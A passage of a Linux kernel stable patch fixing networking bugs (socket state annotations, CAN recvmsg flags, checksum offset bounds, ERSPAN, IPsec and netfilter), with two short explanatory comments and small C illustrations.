+ 	chan = l2cap_get_chan_by_scid(conn, scid);
+ 	if (!chan) {
+-		mutex_unlock(&conn->chan_lock);
+ 		return 0;
+ 	}
+ 
+diff --git a/net/bridge/br_forward.c b/net/bridge/br_forward.c
+index 02bb620d3b8da..bd54f17e3c3d8 100644
+--- a/net/bridge/br_forward.c
++++ b/net/bridge/br_forward.c
+@@ -42,7 +42,7 @@ int br_dev_queue_push_xmit(struct net *net, struct sock *sk, struct sk_buff *skb
+ 	    eth_type_vlan(skb->protocol)) {
+ 		int depth;
+ 
+-		if (!__vlan_get_protocol(skb, skb->protocol, &depth))
++		if (!vlan_get_protocol_and_depth(skb, skb->protocol, &depth))
+ 			goto drop;
+ 
+ 		skb_set_network_header(skb, depth);
+diff --git a/net/bridge/br_private_tunnel.h b/net/bridge/br_private_tunnel.h
+index 2b053289f0166..efb096025151a 100644
+--- a/net/bridge/br_private_tunnel.h
++++ b/net/bridge/br_private_tunnel.h
+@@ -27,6 +27,10 @@ int br_process_vlan_tunnel_info(const struct net_bridge *br,
+ int br_get_vlan_tunnel_info_size(struct net_bridge_vlan_group *vg);
+ int br_fill_vlan_tunnel_info(struct sk_buff *skb,
+ 			     struct net_bridge_vlan_group *vg);
++bool vlan_tunid_inrange(const struct net_bridge_vlan *v_curr,
++			const struct net_bridge_vlan *v_last);
++int br_vlan_tunnel_info(const struct net_bridge_port *p, int cmd,
++			u16 vid, u32 tun_id, bool *changed);
+ 
+ #ifdef CONFIG_BRIDGE_VLAN_FILTERING
+ /* br_vlan_tunnel.c */
+@@ -43,10 +47,6 @@ void br_handle_ingress_vlan_tunnel(struct sk_buff *skb,
+ 				   struct net_bridge_vlan_group *vg);
+ int br_handle_egress_vlan_tunnel(struct sk_buff *skb,
+ 				 struct net_bridge_vlan *vlan);
+-bool vlan_tunid_inrange(const struct net_bridge_vlan *v_curr,
+-			const struct net_bridge_vlan *v_last);
+-int br_vlan_tunnel_info(const struct net_bridge_port *p, int cmd,
+-			u16 vid, u32 tun_id, bool *changed);
+ #else
+ static inline int vlan_tunnel_init(struct net_bridge_vlan_group *vg)
+ {
+diff --git a/net/can/isotp.c b/net/can/isotp.c
+index 5761d4ab839dd..1af623839bffa 100644
+--- a/net/can/isotp.c
++++ b/net/can/isotp.c
+@@ -1106,7 +1106,7 @@ static int isotp_recvmsg(struct socket *sock, struct msghdr *msg, size_t size,
+ 	struct isotp_sock *so = isotp_sk(sk);
+ 	int ret = 0;
+ 
+-	if (flags & ~(MSG_DONTWAIT | MSG_TRUNC | MSG_PEEK))
++	if (flags & ~(MSG_DONTWAIT | MSG_TRUNC | MSG_PEEK | MSG_CMSG_COMPAT))
+ 		return -EINVAL;
+ 
+ 	if (!so->bound)
+diff --git a/net/can/j1939/socket.c b/net/can/j1939/socket.c
+index b670ba03a675c..4fb3a99b5f67e 100644
+--- a/net/can/j1939/socket.c
++++ b/net/can/j1939/socket.c
+@@ -798,7 +798,7 @@ static int j1939_sk_recvmsg(struct socket *sock, struct msghdr *msg,
+ 	struct j1939_sk_buff_cb *skcb;
+ 	int ret = 0;
+ 
+-	if (flags & ~(MSG_DONTWAIT | MSG_ERRQUEUE))
++	if (flags & ~(MSG_DONTWAIT | MSG_ERRQUEUE | MSG_CMSG_COMPAT))
+ 		return -EINVAL;
+ 
+ 	if (flags & MSG_ERRQUEUE)
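
Both CAN hunks widen the recvmsg() flag mask to tolerate MSG_CMSG_COMPAT, which the compat syscall path sets internally; without it, 32-bit userspace on a 64-bit kernel got a spurious -EINVAL. The validation idiom itself, checking flags against an explicit allow-list, in isolation (flag values as on Linux):

#include <errno.h>
#include <stdio.h>

#define MSG_DONTWAIT	0x40
#define MSG_TRUNC	0x20
#define MSG_PEEK	0x02
#define MSG_CMSG_COMPAT	0x80000000u	/* set by the compat entry path */

static int recv_check_flags(unsigned int flags)
{
	/* Reject anything outside the explicit allow-list. */
	if (flags & ~(MSG_DONTWAIT | MSG_TRUNC | MSG_PEEK | MSG_CMSG_COMPAT))
		return -EINVAL;
	return 0;
}

int main(void)
{
	printf("%d\n", recv_check_flags(MSG_PEEK | MSG_CMSG_COMPAT));	/* 0 */
	printf("%d\n", recv_check_flags(0x04));				/* -EINVAL */
	return 0;
}
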
+diff --git a/net/core/datagram.c b/net/core/datagram.c
+index e4ff2db40c981..8dabb9a74cb17 100644
+--- a/net/core/datagram.c
++++ b/net/core/datagram.c
+@@ -799,18 +799,21 @@ __poll_t datagram_poll(struct file *file, struct socket *sock,
+ {
+ 	struct sock *sk = sock->sk;
+ 	__poll_t mask;
++	u8 shutdown;
+ 
+ 	sock_poll_wait(file, sock, wait);
+ 	mask = 0;
+ 
+ 	/* exceptional events? */
+-	if (sk->sk_err || !skb_queue_empty_lockless(&sk->sk_error_queue))
++	if (READ_ONCE(sk->sk_err) ||
++	    !skb_queue_empty_lockless(&sk->sk_error_queue))
+ 		mask |= EPOLLERR |
+ 			(sock_flag(sk, SOCK_SELECT_ERR_QUEUE) ? EPOLLPRI : 0);
+ 
+-	if (sk->sk_shutdown & RCV_SHUTDOWN)
++	shutdown = READ_ONCE(sk->sk_shutdown);
++	if (shutdown & RCV_SHUTDOWN)
+ 		mask |= EPOLLRDHUP | EPOLLIN | EPOLLRDNORM;
+-	if (sk->sk_shutdown == SHUTDOWN_MASK)
++	if (shutdown == SHUTDOWN_MASK)
+ 		mask |= EPOLLHUP;
+ 
+ 	/* readable? */
+@@ -819,10 +822,12 @@ __poll_t datagram_poll(struct file *file, struct socket *sock,
+ 
+ 	/* Connection-based need to check for termination and startup */
+ 	if (connection_based(sk)) {
+-		if (sk->sk_state == TCP_CLOSE)
++		int state = READ_ONCE(sk->sk_state);
++
++		if (state == TCP_CLOSE)
+ 			mask |= EPOLLHUP;
+ 		/* connection hasn't started yet? */
+-		if (sk->sk_state == TCP_SYN_SENT)
++		if (state == TCP_SYN_SENT)
+ 			return mask;
+ 	}
+ 
+diff --git a/net/core/dev.c b/net/core/dev.c
+index a25b8741b1599..93d430693ca0f 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -2549,6 +2549,8 @@ int __netif_set_xps_queue(struct net_device *dev, const unsigned long *mask,
+ 	struct xps_map *map, *new_map;
+ 	unsigned int nr_ids;
+ 
++	WARN_ON_ONCE(index >= dev->num_tx_queues);
++
+ 	if (dev->num_tc) {
+ 		/* Do not allow XPS on subordinate device directly */
+ 		num_tc = dev->num_tc;
+@@ -3350,7 +3352,7 @@ __be16 skb_network_protocol(struct sk_buff *skb, int *depth)
+ 		type = eth->h_proto;
+ 	}
+ 
+-	return __vlan_get_protocol(skb, type, depth);
++	return vlan_get_protocol_and_depth(skb, type, depth);
+ }
+ 
+ /* openvswitch calls this on rx path, so we need a different check.
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index ccfd9053754a9..47660002cadaf 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -5053,7 +5053,7 @@ bool skb_partial_csum_set(struct sk_buff *skb, u16 start, u16 off)
+ 	u32 csum_end = (u32)start + (u32)off + sizeof(__sum16);
+ 	u32 csum_start = skb_headroom(skb) + (u32)start;
+ 
+-	if (unlikely(csum_start > U16_MAX || csum_end > skb_headlen(skb))) {
++	if (unlikely(csum_start >= U16_MAX || csum_end > skb_headlen(skb))) {
+ 		net_warn_ratelimited("bad partial csum: csum=%u/%u headroom=%u headlen=%u\n",
+ 				     start, off, skb_headroom(skb), skb_headlen(skb));
+ 		return false;
+@@ -5061,7 +5061,7 @@ bool skb_partial_csum_set(struct sk_buff *skb, u16 start, u16 off)
+ 	skb->ip_summed = CHECKSUM_PARTIAL;
+ 	skb->csum_start = csum_start;
+ 	skb->csum_offset = off;
+-	skb_set_transport_header(skb, start);
++	skb->transport_header = csum_start;
+ 	return true;
+ }
+ EXPORT_SYMBOL_GPL(skb_partial_csum_set);
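
skb->csum_start and skb->transport_header are 16-bit fields, and as far as I can tell the all-ones value doubles as the "offset not set" sentinel for skb header offsets, which would explain the bound tightening from > U16_MAX to >= U16_MAX; the fix also stores the already-validated csum_start directly instead of recomputing it through skb_set_transport_header(). The truncation hazard in isolation, as a hedged sketch:

#include <stdint.h>
#include <stdio.h>

#define OFFSET_UNSET 0xffffu	/* assumed all-ones "not set" marker */

struct pkt { uint16_t transport_header; };

static int set_offset(struct pkt *p, uint32_t off)
{
	/* >= keeps the sentinel value unreachable as a real offset. */
	if (off >= OFFSET_UNSET)
		return -1;

	p->transport_header = (uint16_t)off;	/* known not to truncate */
	return 0;
}

int main(void)
{
	struct pkt p;

	printf("%d\n", set_offset(&p, 1500));	/*  0: fits */
	printf("%d\n", set_offset(&p, 0xffff));	/* -1: would alias the sentinel */
	return 0;
}
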
+diff --git a/net/core/stream.c b/net/core/stream.c
+index cbb268c15251c..5b05b889d31af 100644
+--- a/net/core/stream.c
++++ b/net/core/stream.c
+@@ -73,8 +73,8 @@ int sk_stream_wait_connect(struct sock *sk, long *timeo_p)
+ 		add_wait_queue(sk_sleep(sk), &wait);
+ 		sk->sk_write_pending++;
+ 		done = sk_wait_event(sk, timeo_p,
+-				     !sk->sk_err &&
+-				     !((1 << sk->sk_state) &
++				     !READ_ONCE(sk->sk_err) &&
++				     !((1 << READ_ONCE(sk->sk_state)) &
+ 				       ~(TCPF_ESTABLISHED | TCPF_CLOSE_WAIT)), &wait);
+ 		remove_wait_queue(sk_sleep(sk), &wait);
+ 		sk->sk_write_pending--;
+@@ -87,9 +87,9 @@ EXPORT_SYMBOL(sk_stream_wait_connect);
+  * sk_stream_closing - Return 1 if we still have things to send in our buffers.
+  * @sk: socket to verify
+  */
+-static inline int sk_stream_closing(struct sock *sk)
++static int sk_stream_closing(const struct sock *sk)
+ {
+-	return (1 << sk->sk_state) &
++	return (1 << READ_ONCE(sk->sk_state)) &
+ 	       (TCPF_FIN_WAIT1 | TCPF_CLOSING | TCPF_LAST_ACK);
+ }
+ 
+@@ -142,8 +142,8 @@ int sk_stream_wait_memory(struct sock *sk, long *timeo_p)
+ 
+ 		set_bit(SOCK_NOSPACE, &sk->sk_socket->flags);
+ 		sk->sk_write_pending++;
+-		sk_wait_event(sk, &current_timeo, sk->sk_err ||
+-						  (sk->sk_shutdown & SEND_SHUTDOWN) ||
++		sk_wait_event(sk, &current_timeo, READ_ONCE(sk->sk_err) ||
++						  (READ_ONCE(sk->sk_shutdown) & SEND_SHUTDOWN) ||
+ 						  (sk_stream_memory_free(sk) &&
+ 						  !vm_wait), &wait);
+ 		sk->sk_write_pending--;
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index 5b19b77d5d759..5fd0ff5734e36 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -897,7 +897,7 @@ int inet_shutdown(struct socket *sock, int how)
+ 		   EPOLLHUP, even on eg. unconnected UDP sockets -- RR */
+ 		fallthrough;
+ 	default:
+-		sk->sk_shutdown |= how;
++		WRITE_ONCE(sk->sk_shutdown, sk->sk_shutdown | how);
+ 		if (sk->sk_prot->shutdown)
+ 			sk->sk_prot->shutdown(sk, how);
+ 		break;
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 6667c3538f2ab..1fb67f819de49 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -498,6 +498,7 @@ __poll_t tcp_poll(struct file *file, struct socket *sock, poll_table *wait)
+ 	__poll_t mask;
+ 	struct sock *sk = sock->sk;
+ 	const struct tcp_sock *tp = tcp_sk(sk);
++	u8 shutdown;
+ 	int state;
+ 
+ 	sock_poll_wait(file, sock, wait);
+@@ -540,9 +541,10 @@ __poll_t tcp_poll(struct file *file, struct socket *sock, poll_table *wait)
+ 	 * NOTE. Check for TCP_CLOSE is added. The goal is to prevent
+ 	 * blocking on fresh not-connected or disconnected socket. --ANK
+ 	 */
+-	if (sk->sk_shutdown == SHUTDOWN_MASK || state == TCP_CLOSE)
++	shutdown = READ_ONCE(sk->sk_shutdown);
++	if (shutdown == SHUTDOWN_MASK || state == TCP_CLOSE)
+ 		mask |= EPOLLHUP;
+-	if (sk->sk_shutdown & RCV_SHUTDOWN)
++	if (shutdown & RCV_SHUTDOWN)
+ 		mask |= EPOLLIN | EPOLLRDNORM | EPOLLRDHUP;
+ 
+ 	/* Connected or passive Fast Open socket? */
+@@ -559,7 +561,7 @@ __poll_t tcp_poll(struct file *file, struct socket *sock, poll_table *wait)
+ 		if (tcp_stream_is_readable(sk, target))
+ 			mask |= EPOLLIN | EPOLLRDNORM;
+ 
+-		if (!(sk->sk_shutdown & SEND_SHUTDOWN)) {
++		if (!(shutdown & SEND_SHUTDOWN)) {
+ 			if (__sk_stream_is_writeable(sk, 1)) {
+ 				mask |= EPOLLOUT | EPOLLWRNORM;
+ 			} else {  /* send SIGIO later */
+@@ -2865,7 +2867,7 @@ void __tcp_close(struct sock *sk, long timeout)
+ 	int data_was_unread = 0;
+ 	int state;
+ 
+-	sk->sk_shutdown = SHUTDOWN_MASK;
++	WRITE_ONCE(sk->sk_shutdown, SHUTDOWN_MASK);
+ 
+ 	if (sk->sk_state == TCP_LISTEN) {
+ 		tcp_set_state(sk, TCP_CLOSE);
+@@ -3117,7 +3119,7 @@ int tcp_disconnect(struct sock *sk, int flags)
+ 
+ 	inet_bhash2_reset_saddr(sk);
+ 
+-	sk->sk_shutdown = 0;
++	WRITE_ONCE(sk->sk_shutdown, 0);
+ 	sock_reset_flag(sk, SOCK_DONE);
+ 	tp->srtt_us = 0;
+ 	tp->mdev_us = jiffies_to_usecs(TCP_TIMEOUT_INIT);
+@@ -4645,7 +4647,7 @@ void tcp_done(struct sock *sk)
+ 	if (req)
+ 		reqsk_fastopen_remove(sk, req, false);
+ 
+-	sk->sk_shutdown = SHUTDOWN_MASK;
++	WRITE_ONCE(sk->sk_shutdown, SHUTDOWN_MASK);
+ 
+ 	if (!sock_flag(sk, SOCK_DEAD))
+ 		sk->sk_state_change(sk);
+diff --git a/net/ipv4/tcp_bpf.c b/net/ipv4/tcp_bpf.c
+index ebf9175119370..2e9547467edbe 100644
+--- a/net/ipv4/tcp_bpf.c
++++ b/net/ipv4/tcp_bpf.c
+@@ -168,7 +168,7 @@ static int tcp_msg_wait_data(struct sock *sk, struct sk_psock *psock,
+ 	sk_set_bit(SOCKWQ_ASYNC_WAITDATA, sk);
+ 	ret = sk_wait_event(sk, &timeo,
+ 			    !list_empty(&psock->ingress_msg) ||
+-			    !skb_queue_empty(&sk->sk_receive_queue), &wait);
++			    !skb_queue_empty_lockless(&sk->sk_receive_queue), &wait);
+ 	sk_clear_bit(SOCKWQ_ASYNC_WAITDATA, sk);
+ 	remove_wait_queue(sk_sleep(sk), &wait);
+ 	return ret;
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index 0640453fce54b..ac44edd6f52e6 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -4361,7 +4361,7 @@ void tcp_fin(struct sock *sk)
+ 
+ 	inet_csk_schedule_ack(sk);
+ 
+-	sk->sk_shutdown |= RCV_SHUTDOWN;
++	WRITE_ONCE(sk->sk_shutdown, sk->sk_shutdown | RCV_SHUTDOWN);
+ 	sock_set_flag(sk, SOCK_DONE);
+ 
+ 	switch (sk->sk_state) {
+@@ -6585,7 +6585,7 @@ int tcp_rcv_state_process(struct sock *sk, struct sk_buff *skb)
+ 			break;
+ 
+ 		tcp_set_state(sk, TCP_FIN_WAIT2);
+-		sk->sk_shutdown |= SEND_SHUTDOWN;
++		WRITE_ONCE(sk->sk_shutdown, sk->sk_shutdown | SEND_SHUTDOWN);
+ 
+ 		sk_dst_confirm(sk);
+ 
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index ad0a5f185a694..b37c1bcb15097 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -829,6 +829,9 @@ static void tcp_v4_send_reset(const struct sock *sk, struct sk_buff *skb)
+ 				   inet_twsk(sk)->tw_priority : sk->sk_priority;
+ 		transmit_time = tcp_transmit_time(sk);
+ 		xfrm_sk_clone_policy(ctl_sk, sk);
++	} else {
++		ctl_sk->sk_mark = 0;
++		ctl_sk->sk_priority = 0;
+ 	}
+ 	ip_send_unicast_reply(ctl_sk,
+ 			      skb, &TCP_SKB_CB(skb)->header.h4.opt,
+@@ -836,7 +839,6 @@ static void tcp_v4_send_reset(const struct sock *sk, struct sk_buff *skb)
+ 			      &arg, arg.iov[0].iov_len,
+ 			      transmit_time);
+ 
+-	ctl_sk->sk_mark = 0;
+ 	xfrm_sk_free_policy(ctl_sk);
+ 	sock_net_set(ctl_sk, &init_net);
+ 	__TCP_INC_STATS(net, TCP_MIB_OUTSEGS);
+@@ -935,7 +937,6 @@ static void tcp_v4_send_ack(const struct sock *sk,
+ 			      &arg, arg.iov[0].iov_len,
+ 			      transmit_time);
+ 
+-	ctl_sk->sk_mark = 0;
+ 	sock_net_set(ctl_sk, &init_net);
+ 	__TCP_INC_STATS(net, TCP_MIB_OUTSEGS);
+ 	local_bh_enable();
+diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
+index 4d5937af08ee9..216b40ccadae0 100644
+--- a/net/ipv6/ip6_gre.c
++++ b/net/ipv6/ip6_gre.c
+@@ -1037,12 +1037,14 @@ static netdev_tx_t ip6erspan_tunnel_xmit(struct sk_buff *skb,
+ 					    ntohl(tun_id),
+ 					    ntohl(md->u.index), truncate,
+ 					    false);
++			proto = htons(ETH_P_ERSPAN);
+ 		} else if (md->version == 2) {
+ 			erspan_build_header_v2(skb,
+ 					       ntohl(tun_id),
+ 					       md->u.md2.dir,
+ 					       get_hwid(&md->u.md2),
+ 					       truncate, false);
++			proto = htons(ETH_P_ERSPAN2);
+ 		} else {
+ 			goto tx_err;
+ 		}
+@@ -1065,24 +1067,25 @@ static netdev_tx_t ip6erspan_tunnel_xmit(struct sk_buff *skb,
+ 			break;
+ 		}
+ 
+-		if (t->parms.erspan_ver == 1)
++		if (t->parms.erspan_ver == 1) {
+ 			erspan_build_header(skb, ntohl(t->parms.o_key),
+ 					    t->parms.index,
+ 					    truncate, false);
+-		else if (t->parms.erspan_ver == 2)
++			proto = htons(ETH_P_ERSPAN);
++		} else if (t->parms.erspan_ver == 2) {
+ 			erspan_build_header_v2(skb, ntohl(t->parms.o_key),
+ 					       t->parms.dir,
+ 					       t->parms.hwid,
+ 					       truncate, false);
+-		else
++			proto = htons(ETH_P_ERSPAN2);
++		} else {
+ 			goto tx_err;
++		}
+ 
+ 		fl6.daddr = t->parms.raddr;
+ 	}
+ 
+ 	/* Push GRE header. */
+-	proto = (t->parms.erspan_ver == 1) ? htons(ETH_P_ERSPAN)
+-					   : htons(ETH_P_ERSPAN2);
+ 	gre_build_header(skb, 8, TUNNEL_SEQ, proto, 0, htonl(atomic_fetch_inc(&t->o_seqno)));
+ 
+ 	/* TooBig packet may have updated dst->dev's mtu */
+diff --git a/net/key/af_key.c b/net/key/af_key.c
+index 95edcbedf6ef2..8c21de50eadf8 100644
+--- a/net/key/af_key.c
++++ b/net/key/af_key.c
+@@ -1940,7 +1940,8 @@ static u32 gen_reqid(struct net *net)
+ }
+ 
+ static int
+-parse_ipsecrequest(struct xfrm_policy *xp, struct sadb_x_ipsecrequest *rq)
++parse_ipsecrequest(struct xfrm_policy *xp, struct sadb_x_policy *pol,
++		   struct sadb_x_ipsecrequest *rq)
+ {
+ 	struct net *net = xp_net(xp);
+ 	struct xfrm_tmpl *t = xp->xfrm_vec + xp->xfrm_nr;
+@@ -1958,9 +1959,12 @@ parse_ipsecrequest(struct xfrm_policy *xp, struct sadb_x_ipsecrequest *rq)
+ 	if ((mode = pfkey_mode_to_xfrm(rq->sadb_x_ipsecrequest_mode)) < 0)
+ 		return -EINVAL;
+ 	t->mode = mode;
+-	if (rq->sadb_x_ipsecrequest_level == IPSEC_LEVEL_USE)
++	if (rq->sadb_x_ipsecrequest_level == IPSEC_LEVEL_USE) {
++		if ((mode == XFRM_MODE_TUNNEL || mode == XFRM_MODE_BEET) &&
++		    pol->sadb_x_policy_dir == IPSEC_DIR_OUTBOUND)
++			return -EINVAL;
+ 		t->optional = 1;
+-	else if (rq->sadb_x_ipsecrequest_level == IPSEC_LEVEL_UNIQUE) {
++	} else if (rq->sadb_x_ipsecrequest_level == IPSEC_LEVEL_UNIQUE) {
+ 		t->reqid = rq->sadb_x_ipsecrequest_reqid;
+ 		if (t->reqid > IPSEC_MANUAL_REQID_MAX)
+ 			t->reqid = 0;
+@@ -2002,7 +2006,7 @@ parse_ipsecrequests(struct xfrm_policy *xp, struct sadb_x_policy *pol)
+ 		    rq->sadb_x_ipsecrequest_len < sizeof(*rq))
+ 			return -EINVAL;
+ 
+-		if ((err = parse_ipsecrequest(xp, rq)) < 0)
++		if ((err = parse_ipsecrequest(xp, pol, rq)) < 0)
+ 			return err;
+ 		len -= rq->sadb_x_ipsecrequest_len;
+ 		rq = (void*)((u8*)rq + rq->sadb_x_ipsecrequest_len);
+diff --git a/net/llc/af_llc.c b/net/llc/af_llc.c
+index da7fe94bea2eb..9ffbc667be6cf 100644
+--- a/net/llc/af_llc.c
++++ b/net/llc/af_llc.c
+@@ -583,7 +583,8 @@ static int llc_ui_wait_for_disc(struct sock *sk, long timeout)
+ 
+ 	add_wait_queue(sk_sleep(sk), &wait);
+ 	while (1) {
+-		if (sk_wait_event(sk, &timeout, sk->sk_state == TCP_CLOSE, &wait))
++		if (sk_wait_event(sk, &timeout,
++				  READ_ONCE(sk->sk_state) == TCP_CLOSE, &wait))
+ 			break;
+ 		rc = -ERESTARTSYS;
+ 		if (signal_pending(current))
+@@ -603,7 +604,8 @@ static bool llc_ui_wait_for_conn(struct sock *sk, long timeout)
+ 
+ 	add_wait_queue(sk_sleep(sk), &wait);
+ 	while (1) {
+-		if (sk_wait_event(sk, &timeout, sk->sk_state != TCP_SYN_SENT, &wait))
++		if (sk_wait_event(sk, &timeout,
++				  READ_ONCE(sk->sk_state) != TCP_SYN_SENT, &wait))
+ 			break;
+ 		if (signal_pending(current) || !timeout)
+ 			break;
+@@ -622,7 +624,7 @@ static int llc_ui_wait_for_busy_core(struct sock *sk, long timeout)
+ 	while (1) {
+ 		rc = 0;
+ 		if (sk_wait_event(sk, &timeout,
+-				  (sk->sk_shutdown & RCV_SHUTDOWN) ||
++				  (READ_ONCE(sk->sk_shutdown) & RCV_SHUTDOWN) ||
+ 				  (!llc_data_accept_state(llc->state) &&
+ 				   !llc->remote_busy_flag &&
+ 				   !llc->p_flag), &wait))
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index e8beec0a0ae1c..06b9df2fbcd77 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -1477,9 +1477,10 @@ static int ieee80211_stop_ap(struct wiphy *wiphy, struct net_device *dev,
+ 		sdata_dereference(link->u.ap.unsol_bcast_probe_resp,
+ 				  sdata);
+ 
+-	/* abort any running channel switch */
++	/* abort any running channel switch or color change */
+ 	mutex_lock(&local->mtx);
+ 	link_conf->csa_active = false;
++	link_conf->color_change_active = false;
+ 	if (link->csa_block_tx) {
+ 		ieee80211_wake_vif_queues(local, sdata,
+ 					  IEEE80211_QUEUE_STOP_REASON_CSA);
+diff --git a/net/mac80211/trace.h b/net/mac80211/trace.h
+index 9f4377566c425..c85367a4757a9 100644
+--- a/net/mac80211/trace.h
++++ b/net/mac80211/trace.h
+@@ -67,7 +67,7 @@
+ 			__entry->min_freq_offset = (c)->chan ? (c)->chan->freq_offset : 0;	\
+ 			__entry->min_chan_width = (c)->width;				\
+ 			__entry->min_center_freq1 = (c)->center_freq1;			\
+-			__entry->freq1_offset = (c)->freq1_offset;			\
++			__entry->min_freq1_offset = (c)->freq1_offset;			\
+ 			__entry->min_center_freq2 = (c)->center_freq2;
+ #define MIN_CHANDEF_PR_FMT	" min_control:%d.%03d MHz min_width:%d min_center: %d.%03d/%d MHz"
+ #define MIN_CHANDEF_PR_ARG	__entry->min_control_freq, __entry->min_freq_offset,	\
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index 6a1708db652f2..763cefd0cc268 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -3718,6 +3718,7 @@ struct sk_buff *ieee80211_tx_dequeue(struct ieee80211_hw *hw,
+ 	ieee80211_tx_result r;
+ 	struct ieee80211_vif *vif = txq->vif;
+ 	int q = vif->hw_queue[txq->ac];
++	unsigned long flags;
+ 	bool q_stopped;
+ 
+ 	WARN_ON_ONCE(softirq_count() == 0);
+@@ -3726,9 +3727,9 @@ struct sk_buff *ieee80211_tx_dequeue(struct ieee80211_hw *hw,
+ 		return NULL;
+ 
+ begin:
+-	spin_lock(&local->queue_stop_reason_lock);
++	spin_lock_irqsave(&local->queue_stop_reason_lock, flags);
+ 	q_stopped = local->queue_stop_reasons[q];
+-	spin_unlock(&local->queue_stop_reason_lock);
++	spin_unlock_irqrestore(&local->queue_stop_reason_lock, flags);
+ 
+ 	if (unlikely(q_stopped)) {
+ 		/* mark for waking later */
+diff --git a/net/netfilter/core.c b/net/netfilter/core.c
+index 6e80f0f6149ea..55a7f72d547cd 100644
+--- a/net/netfilter/core.c
++++ b/net/netfilter/core.c
+@@ -699,9 +699,11 @@ void nf_conntrack_destroy(struct nf_conntrack *nfct)
+ 
+ 	rcu_read_lock();
+ 	ct_hook = rcu_dereference(nf_ct_hook);
+-	BUG_ON(ct_hook == NULL);
+-	ct_hook->destroy(nfct);
++	if (ct_hook)
++		ct_hook->destroy(nfct);
+ 	rcu_read_unlock();
++
++	WARN_ON(!ct_hook);
+ }
+ EXPORT_SYMBOL(nf_conntrack_destroy);
+ 
+diff --git a/net/netfilter/ipvs/ip_vs_sync.c b/net/netfilter/ipvs/ip_vs_sync.c
+index 4963fec815da3..d4fe7bb4f853a 100644
+--- a/net/netfilter/ipvs/ip_vs_sync.c
++++ b/net/netfilter/ipvs/ip_vs_sync.c
+@@ -603,7 +603,7 @@ static void ip_vs_sync_conn_v0(struct netns_ipvs *ipvs, struct ip_vs_conn *cp,
+ 	if (cp->flags & IP_VS_CONN_F_SEQ_MASK) {
+ 		struct ip_vs_sync_conn_options *opt =
+ 			(struct ip_vs_sync_conn_options *)&s[1];
+-		memcpy(opt, &cp->in_seq, sizeof(*opt));
++		memcpy(opt, &cp->sync_conn_opt, sizeof(*opt));
+ 	}
+ 
+ 	m->nr_conns++;
+diff --git a/net/netfilter/nf_conntrack_standalone.c b/net/netfilter/nf_conntrack_standalone.c
+index 460294bd4b606..52245dbfae311 100644
+--- a/net/netfilter/nf_conntrack_standalone.c
++++ b/net/netfilter/nf_conntrack_standalone.c
+@@ -1222,11 +1222,12 @@ static int __init nf_conntrack_standalone_init(void)
+ 	nf_conntrack_htable_size_user = nf_conntrack_htable_size;
+ #endif
+ 
++	nf_conntrack_init_end();
++
+ 	ret = register_pernet_subsys(&nf_conntrack_net_ops);
+ 	if (ret < 0)
+ 		goto out_pernet;
+ 
+-	nf_conntrack_init_end();
+ 	return 0;
+ 
+ out_pernet:
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index f663262df6987..31775d54f4b40 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -3692,12 +3692,10 @@ static struct nft_rule *nft_rule_lookup_byid(const struct net *net,
+ 	struct nft_trans *trans;
+ 
+ 	list_for_each_entry(trans, &nft_net->commit_list, list) {
+-		struct nft_rule *rule = nft_trans_rule(trans);
+-
+ 		if (trans->msg_type == NFT_MSG_NEWRULE &&
+ 		    trans->ctx.chain == chain &&
+ 		    id == nft_trans_rule_id(trans))
+-			return rule;
++			return nft_trans_rule(trans);
+ 	}
+ 	return ERR_PTR(-ENOENT);
+ }
+diff --git a/net/netfilter/nft_chain_filter.c b/net/netfilter/nft_chain_filter.c
+index c3563f0be2692..680fe557686e4 100644
+--- a/net/netfilter/nft_chain_filter.c
++++ b/net/netfilter/nft_chain_filter.c
+@@ -344,6 +344,12 @@ static void nft_netdev_event(unsigned long event, struct net_device *dev,
+ 		return;
+ 	}
+ 
++	/* UNREGISTER events are also happening on netns exit.
++	 *
++	 * Although nf_tables core releases all tables/chains, only this event
++	 * handler provides guarantee that hook->ops.dev is still accessible,
++	 * so we cannot skip exiting net namespaces.
++	 */
+ 	__nft_release_basechain(ctx);
+ }
+ 
+@@ -362,9 +368,6 @@ static int nf_tables_netdev_event(struct notifier_block *this,
+ 	    event != NETDEV_CHANGENAME)
+ 		return NOTIFY_DONE;
+ 
+-	if (!check_net(ctx.net))
+-		return NOTIFY_DONE;
+-
+ 	nft_net = nft_pernet(ctx.net);
+ 	mutex_lock(&nft_net->commit_mutex);
+ 	list_for_each_entry(table, &nft_net->tables, list) {
+diff --git a/net/netfilter/nft_set_rbtree.c b/net/netfilter/nft_set_rbtree.c
+index 19ea4d3c35535..2f114aa10f1a7 100644
+--- a/net/netfilter/nft_set_rbtree.c
++++ b/net/netfilter/nft_set_rbtree.c
+@@ -221,7 +221,7 @@ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ {
+ 	struct nft_set *set = (struct nft_set *)__set;
+ 	struct rb_node *prev = rb_prev(&rbe->node);
+-	struct nft_rbtree_elem *rbe_prev;
++	struct nft_rbtree_elem *rbe_prev = NULL;
+ 	struct nft_set_gc_batch *gcb;
+ 
+ 	gcb = nft_set_gc_batch_check(set, NULL, GFP_ATOMIC);
+@@ -229,17 +229,21 @@ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ 		return -ENOMEM;
+ 
